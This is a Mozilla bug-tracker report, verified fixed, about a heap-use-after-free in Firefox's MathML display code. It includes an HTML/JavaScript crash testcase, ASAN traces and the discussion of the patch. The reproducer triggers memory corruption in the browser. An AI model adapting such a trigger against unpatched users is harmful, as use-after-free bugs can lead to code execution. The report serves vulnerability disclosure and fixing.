Closed
Bug 1426345
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in nsDisplayMathMLCharForeground::GetBounds
Categories
(Core :: MathML, defect)
Tracking
()
VERIFIED
FIXED
mozilla59
| Tracking | Status | |
|---|---|---|
| firefox-esr52 | --- | unaffected |
| firefox57 | --- | unaffected |
| firefox58 | + | verified |
| firefox59 | + | verified |
People
(Reporter: nils, Assigned: MatsPalmgren_bugz)
References
Details
(4 keywords, Whiteboard: [post-critsmash-triage])
Attachments
(3 files)
|
685 bytes,
text/html
|
Details | |
|
21.14 KB,
text/plain
|
Details | |
|
1.39 KB,
patch
|
mattwoodrow
:
review+
abillings
:
approval-mozilla-beta+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=a235bf4868ab9e48c7b2f4bf4cc9bd949ca23c35)
crash.html:
<script>
function spin () {
var x=new XMLHttpRequest();
x.open("POST","https://mozilla.org",false);
try{x.send("X");}catch(e){}
}
function start() {
o683=document.createElementNS('http://www.w3.org/1998/Math/MathML','math');
o685=document.createElementNS('http://www.w3.org/1998/Math/MathML','mo');
document.documentElement.appendChild(o685);
o688=document.createElementNS('http://www.w3.org/1998/Math/MathML','mfenced');
document.documentElement.appendChild(o688);
o693=document.createElementNS('http://www.w3.org/1998/Math/MathML','msubsup');
o685.appendChild(o693);
spin();
o693.setAttribute('style','');undefined;
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==7786==ERROR: AddressSanitizer: heap-use-after-free on address 0x6110002a0c10 at pc 0x7fcd1c122f52 bp 0x7ffeb8e528e0 sp 0x7ffeb8e528d8
READ of size 4 at 0x6110002a0c10 thread T0 (file:// Content)
#0 0x7fcd1c122f51 in GetRect /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11
#1 0x7fcd1c122f51 in nsDisplayMathMLCharForeground::GetBounds(nsDisplayListBuilder*, bool*) const /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.cpp:1885
#2 0x7fcd1c1b6774 in GetClippedBounds /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:3192:14
#3 0x7fcd1c1b6774 in nsDisplayList::GetClippedBoundsWithRespectToASR(nsDisplayListBuilder*, mozilla::ActiveScrolledRoot const*, nsRect*) const /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2280
#4 0x7fcd1c1b1953 in mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder*, mozilla::layers::LayerManager*, nsIFrame*, nsDisplayItem*, nsDisplayList*, mozilla::ContainerLayerParameters const&, mozilla::gfx::Matrix4x4Typed<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> const*, unsigned int) /builds/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:5627:30
#5 0x7fcd1c24016b in nsDisplayList::PaintRoot(nsDisplayListBuilder*, gfxContext*, unsigned int) /builds/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2577:9
#6 0x7fcd1b98938b in nsLayoutUtils::PaintFrame(gfxContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3940:12
#7 0x7fcd1b869c14 in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:6496:5
#8 0x7fcd1afa59ea in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:480:19
#9 0x7fcd1afa44ec in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /builds/worker/workspace/build/src/view/nsViewManager.cpp:412:33
#10 0x7fcd1afa8406 in nsViewManager::ProcessPendingUpdates() /builds/worker/workspace/build/src/view/nsViewManager.cpp:1102:5
#11 0x7fcd1b7b4de9 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2046:11
#12 0x7fcd1b7c188f in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
#13 0x7fcd1b7c188f in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
#14 0x7fcd1b7c1456 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
#15 0x7fcd1b7c3cce in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
#16 0x7fcd1b7c3cce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
#17 0x7fcd1b7c38ce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
#18 0x7fcd1c0afecf in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
#19 0x7fcd14ff9190 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
#20 0x7fcd14ea5418 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1812:28
#21 0x7fcd14aae61e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2110:25
#22 0x7fcd14aab697 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2040:17
#23 0x7fcd14aacd9c in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1886:5
#24 0x7fcd14aad3f8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1919:15
#25 0x7fcd13c117c6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
#26 0x7fcd13c2d2b0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:508:10
#27 0x7fcd14ab673a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#28 0x7fcd14a0d6c9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#29 0x7fcd14a0d6c9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#30 0x7fcd14a0d6c9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#31 0x7fcd1b02f5ba in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
#32 0x7fcd1f75ca4b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
#33 0x7fcd14a0d6c9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#34 0x7fcd14a0d6c9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#35 0x7fcd14a0d6c9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#36 0x7fcd1f75c43d in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:34
#37 0x4ee965 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#38 0x4ee965 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#39 0x7fcd327ce560 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20560)
#40 0x41dfe8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41dfe8)
0x6110002a0c10 is located 16 bytes inside of 200-byte region [0x6110002a0c00,0x6110002a0cc8)
freed by thread T0 (file:// Content) here:
#0 0x4bea42 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
#1 0x7fcd1c0f5080 in operator delete /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:183:12
#2 0x7fcd1c0f5080 in nsMathMLmfencedFrame::RemoveFencesAndSeparators() /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:87
#3 0x7fcd1c0f5588 in nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:39:3
#4 0x7fcd1c0f690f in non-virtual thunk to nsMathMLmfencedFrame::InheritAutomaticData(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp
#5 0x7fcd1c0d2960 in nsMathMLContainerFrame::RebuildAutomaticDataForChildren(nsIFrame*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:660:25
#6 0x7fcd1c114118 in nsMathMLmoFrame::MarkIntrinsicISizesDirty() /builds/worker/workspace/build/src/layout/mathml/nsMathMLmoFrame.cpp:1027:3
#7 0x7fcd1b833d9d in mozilla::PresShell::FrameNeedsReflow(nsIFrame*, nsIPresShell::IntrinsicDirty, nsFrameState, nsIPresShell::ReflowRootHandling) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:2759:12
#8 0x7fcd1c0d365a in nsMathMLContainerFrame::AttributeChanged(int, nsAtom*, int) /builds/worker/workspace/build/src/layout/mathml/nsMathMLContainerFrame.cpp:774:5
#9 0x7fcd1b8976be in mozilla::ServoRestyleManager::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1482:19
#10 0x7fcd1b853737 in AttributeChanged /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:72:3
#11 0x7fcd1b853737 in mozilla::PresShell::AttributeChanged(nsIDocument*, mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4425
#12 0x7fcd16f3d61e in nsNodeUtils::AttributeChanged(mozilla::dom::Element*, int, nsAtom*, int, nsAttrValue const*) /builds/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:140:3
#13 0x7fcd16bcd9c4 in mozilla::dom::Element::SetAttrAndNotify(int, nsAtom*, nsAtom*, nsAttrValue const*, nsAttrValue&, nsIPrincipal*, unsigned char, bool, bool, bool, nsIDocument*, mozAutoDocUpdate const&) /builds/worker/workspace/build/src/dom/base/Element.cpp:2822:5
#14 0x7fcd16bcf6aa in mozilla::dom::Element::SetAttr(int, nsAtom*, nsAtom*, nsTSubstring<char16_t> const&, nsIPrincipal*, bool) /builds/worker/workspace/build/src/dom/base/Element.cpp:2648:10
#15 0x7fcd16bc3b22 in SetAttr /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/Element.h:812:12
#16 0x7fcd16bc3b22 in mozilla::dom::Element::SetAttribute(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsIPrincipal*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/Element.cpp:1378
#17 0x7fcd18892c51 in mozilla::dom::ElementBinding::setAttribute(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:1154:9
#18 0x7fcd18e8a7f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
#19 0x7fcd1fa2ffd4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#20 0x7fcd1fa2ffd4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#21 0x7fcd1fa160b6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
#22 0x7fcd1fa160b6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
#23 0x7fcd1fa02820 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
#24 0x7fcd1fa3050c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
#25 0x7fcd1fa31032 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
#26 0x7fcd2052eddc in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2995:12
#27 0x7fcd187ba37e in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
#28 0x7fcd193848e3 in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
#29 0x7fcd193848e3 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
#30 0x7fcd1934b021 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1111:51
#31 0x7fcd1934cf32 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:20
#32 0x7fcd193363e2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:496:16
#33 0x7fcd19339f58 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:865:9
#34 0x7fcd1b93d7fa in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1070:7
#35 0x7fcd1ecace22 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7907:21
previously allocated by thread T0 (file:// Content) here:
#0 0x4bed83 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
#1 0x4ef7ed in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
#2 0x7fcd1c0f59fa in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:159:12
#3 0x7fcd1c0f59fa in nsMathMLmfencedFrame::CreateFencesAndSeparators(nsPresContext*) /builds/worker/workspace/build/src/layout/mathml/nsMathMLmfencedFrame.cpp:111
#4 0x7fcd1b8f04e2 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4222:28
#5 0x7fcd1b8fa317 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6362:3
#6 0x7fcd1b8d6cb5 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList&, nsContainerFrame*, bool, nsFrameItems&) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10808:5
#7 0x7fcd1b907f99 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, nsCSSFrameConstructor::InsertionKind, TreeMatchContext*) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7717:3
#8 0x7fcd1b816aac in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1414:27
#9 0x7fcd1b894ba3 in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1161:9
#10 0x7fcd1b84ecfe in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1237:3
#11 0x7fcd1b84ecfe in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
#12 0x7fcd1b84ecfe in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4226
#13 0x7fcd1b7b2577 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:580:5
#14 0x7fcd1b7b2577 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1891
#15 0x7fcd1b7c188f in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
#16 0x7fcd1b7c188f in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
#17 0x7fcd1b7c1456 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
#18 0x7fcd1b7c3cce in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
#19 0x7fcd1b7c3cce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
#20 0x7fcd1b7c38ce in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
#21 0x7fcd1c0afecf in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
#22 0x7fcd14ff9190 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
#23 0x7fcd14ea5418 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1812:28
#24 0x7fcd14aae61e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2110:25
#25 0x7fcd14aab697 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2040:17
#26 0x7fcd14aacd9c in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1886:5
#27 0x7fcd14aad3f8 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1919:15
#28 0x7fcd13c117c6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
#29 0x7fcd13c2d2b0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:508:10
#30 0x7fcd1ae455e3 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
#31 0x7fcd1ae455e3 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3110
#32 0x7fcd1ae46fd9 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2939:11
#33 0x7fcd1852177e in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1249:9
#34 0x7fcd18e8a7f7 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3042:13
#35 0x7fcd1fa2ffd4 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#36 0x7fcd1fa2ffd4 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#37 0x7fcd1fa160b6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
#38 0x7fcd1fa160b6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3096
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/layout/mathml/nsMathMLChar.h:155:11 in GetRect
Shadow bytes around the buggy address:
0x0c228004c130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c228004c140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c228004c150: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c228004c160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c228004c170: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
=>0x0c228004c180: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c228004c190: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
0x0c228004c1a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c228004c1b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c228004c1c0: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c228004c1d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7786==ABORTING
Anthony, do you know who might be able to work on this? Thanks.
|
Assignee | |
Comment 3•8 years ago
|
||
This is exactly the same problem as in bug 1417010:
(rr) bt
#0 nsMathMLChar::~nsMathMLChar at layout/mathml/nsMathMLChar.cpp:759
#1 nsMathMLmfencedFrame::RemoveFencesAndSeparators at layout/mathml/nsMathMLmfencedFrame.cpp:87
#2 nsMathMLmfencedFrame::InheritAutomaticData at layout/mathml/nsMathMLmfencedFrame.cpp:39
#3 nsMathMLContainerFrame::RebuildAutomaticDataForChildren at layout/mathml/nsMathMLContainerFrame.cpp:660
#4 nsMathMLmoFrame::MarkIntrinsicISizesDirty at layout/mathml/nsMathMLmoFrame.cpp:1027
#5 mozilla::PresShell::FrameNeedsReflow at layout/base/PresShell.cpp:2757
#6 nsMathMLContainerFrame::AttributeChanged at layout/mathml/nsMathMLContainerFrame.cpp:774
#7 mozilla::ServoRestyleManager::AttributeChanged at layout/base/ServoRestyleManager.cpp:1482
#8 mozilla::RestyleManager::AttributeChanged at dist/include/mozilla/RestyleManagerInlines.h:72
[...]
(see bug 1417010 comment 4)
Assignee: nobody → mats
Flags: needinfo?(ajones)
|
|
Assignee | |
Comment 4•8 years ago
|
||
There are several callers of RemoveFencesAndSeparators and I don't
understand why we chose to fix only one of them in bug 1417010.
I think we should invalidate in RemoveFencesAndSeparators instead
to fix all current and future callers.
Attachment #8938821 -
Flags: review?(matt.woodrow)
|
||
Updated•8 years ago
|
Attachment #8938821 -
Flags: review?(matt.woodrow) → review+
|
|
Assignee | |
Comment 5•8 years ago
|
||
Comment on attachment 8938821 [details] [diff] [review]
Invalidate MathML display items when we destroy the referenced nsMathMLChar
See bug 1417010 comment 12.
This is a follow-up since that fix was incomplete.
Attachment #8938821 -
Flags: sec-approval?
Attachment #8938821 -
Flags: approval-mozilla-beta?
|
|
Assignee | |
Updated•8 years ago
|
Flags: in-testsuite?
|
||
Comment 6•8 years ago
|
||
Comment on attachment 8938821 [details] [diff] [review]
Invalidate MathML display items when we destroy the referenced nsMathMLChar
sec-approval+ and beta approval.
Attachment #8938821 -
Flags: sec-approval?
Attachment #8938821 -
Flags: sec-approval+
Attachment #8938821 -
Flags: approval-mozilla-beta?
Attachment #8938821 -
Flags: approval-mozilla-beta+
|
|
||
Updated•8 years ago
|
status-firefox57:
--- → wontfix
status-firefox58:
--- → affected
status-firefox-esr52:
--- → ?
tracking-firefox58:
--- → +
tracking-firefox59:
--- → +
|
|
Assignee | |
Comment 7•8 years ago
|
||
| uplift | ||
|
|
Assignee | |
Comment 8•8 years ago
|
||
Bug 1417010 has firefox57/esr52:unaffected so I'm setting this to the same.
|
||
Comment 9•8 years ago
|
||
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla59
|
||
Updated•8 years ago
|
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
|
|
||
Updated•8 years ago
|
Flags: sec-bounty?
|
||
Comment 10•8 years ago
|
||
I have managed to reproduce the issue described in comment 0 using Firefox 59.0a1 (BuildId:20171220094437) asan build.
This issue is verified fixed using Firefox 59.0a1 (BuildId:20180119101109) and Firefox 58.0 (BuildId:20180118032629) asan builds on Ubuntu 16.04 64bit.
Status: RESOLVED → VERIFIED
Flags: qe-verify+
|
||
Updated•8 years ago
|
Group: layout-core-security → core-security-release
|
|
||
Updated•8 years ago
|
Group: core-security-release
|
|
||
Updated•7 years ago
|
|
||
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•